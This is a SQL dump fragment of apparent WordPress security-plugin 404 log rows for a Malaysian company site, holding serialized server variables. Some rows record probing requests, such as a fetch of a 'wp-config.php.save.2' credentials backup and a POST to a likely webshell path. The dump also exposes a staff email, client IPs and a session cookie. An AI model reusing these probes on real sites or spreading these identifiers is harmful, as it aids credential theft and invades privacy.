\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xamaw@DM3oDzMu3E5gMX@QAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571396292.0838\";s:12:\"REQUEST_TIME\";s:10:\"1571396292\";}}','notice','2019-10-18 10:58:14','2019-10-18 10:58:12',34918936,36722744,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(28273,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:50:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:10:\"/indes.php\";s:14:\"CONTENT_LENGTH\";s:2:\"28\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/indes.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:10:\"/indes.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xal4fvmhtecMB5k7baciTAAAARI\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/indes.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/indes.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xal4fvmhtecMB5k7baciTAAAARI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"57888\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"https://bintara.com.my/indes.php\";s:10:\"SCRIPT_URL\";s:10:\"/indes.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xal4fvmhtecMB5k7baciTAAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571387518.4138\";s:12:\"REQUEST_TIME\";s:10:\"1571387518\";}}','notice','2019-10-18 08:32:00','2019-10-18 08:31:58',34971792,36781904,'https://bintara.com.my/indes.php',1,0,'193.106.30.99'),(28272,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XalzueDM3oDzMu3E5gP2NAAAAI0\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.71.30\";s:11:\"REMOTE_PORT\";s:5:\"65361\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XalzueDM3oDzMu3E5gP2NAAAAI0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571386297.2312\";s:12:\"REQUEST_TIME\";s:10:\"1571386297\";}}','notice','2019-10-18 08:11:39','2019-10-18 08:11:37',33773984,34130792,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'66.249.71.30'),(28271,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wp-config.php.save.2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.2\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.2\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XalbBPmhtecMB5k7bacatAAAARA\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.2\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wp-config.php.save.2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XalbBPmhtecMB5k7bacatAAAARA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"37.1.204.92\";s:11:\"REMOTE_PORT\";s:5:\"35240\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wp-config.php.save.2\";s:10:\"SCRIPT_URL\";s:21:\"/wp-config.php.save.2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XalbBPmhtecMB5k7bacatAAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571379972.2637\";s:12:\"REQUEST_TIME\";s:10:\"1571379972\";}}','notice','2019-10-18 06:26:15','2019-10-18 06:26:12',35394496,37202928,'https://bintara.com.my/wp-config.php.save.2',1,0,'37.1.204.92'),(28270,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"F80C309E-F5B1-45BB-823C-8289C4866829\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XalZo-I2yqn8iVLYnlQLhQAAAIE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"203.106.173.27\";s:11:\"REMOTE_PORT\";s:5:\"59613\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XalZo-I2yqn8iVLYnlQLhQAAAIE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571379620.0983\";s:12:\"REQUEST_TIME\";s:10:\"1571379620\";}}','notice','2019-10-18 06:20:23','2019-10-18 06:20:20',35661792,37460656,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'203.106.173.27'),(28269,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Publisher 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:2:\"10\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"1799A53C-D216-443E-AFE6-1C53B840DBE6\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xak1OfI2yqn8iVLYnlTnMwAAAIw\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"183.171.184.154\";s:11:\"REMOTE_PORT\";s:5:\"54699\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xak1OfI2yqn8iVLYnlTnMwAAAIw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571370297.6337\";s:12:\"REQUEST_TIME\";s:10:\"1571370297\";}}','notice','2019-10-18 03:45:00','2019-10-18 03:44:58',35663440,37464688,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.184.154'),(28268,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Visio 16.0.12026; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:2:\"12\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"C11BB9C5-E01A-4718-9CC1-40E10685B4C9\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.12026\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakwR-mhtecMB5k7bacP5AAAAQY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"203.106.173.27\";s:11:\"REMOTE_PORT\";s:5:\"52556\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakwR-mhtecMB5k7bacP5AAAAQY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571369031.3768\";s:12:\"REQUEST_TIME\";s:10:\"1571369031\";}}','notice','2019-10-18 03:23:53','2019-10-18 03:23:51',35272080,37065696,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'203.106.173.27'),(28267,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{5D06A997-6B15-437F-8403-4B2FDC7D2F54}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0eb6f9b92ef405d903ff396342c5c1e7\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=FB0523DB-6218-442E-89B8-198D9D15C060\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakwPfmhtecMB5k7bacP4QAAARQ\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"118.100.122.157\";s:11:\"REMOTE_PORT\";s:5:\"60955\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XakwPfmhtecMB5k7bacP4QAAARQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571369021.3158\";s:12:\"REQUEST_TIME\";s:10:\"1571369021\";}}','notice','2019-10-18 03:23:43','2019-10-18 03:23:41',35271120,37065720,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'118.100.122.157'),(28266,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{292B8F3A-D947-4BEC-8C8B-2D229079E23F}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0eb6f9b92ef405d903ff396342c5c1e7\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=FB0523DB-6218-442E-89B8-198D9D15C060\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XakwOfmhtecMB5k7bacP4AAAARU\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"118.100.122.157\";s:11:\"REMOTE_PORT\";s:5:\"60955\";s:14:\"REQUEST_METHOD\";s:4:\"POST\"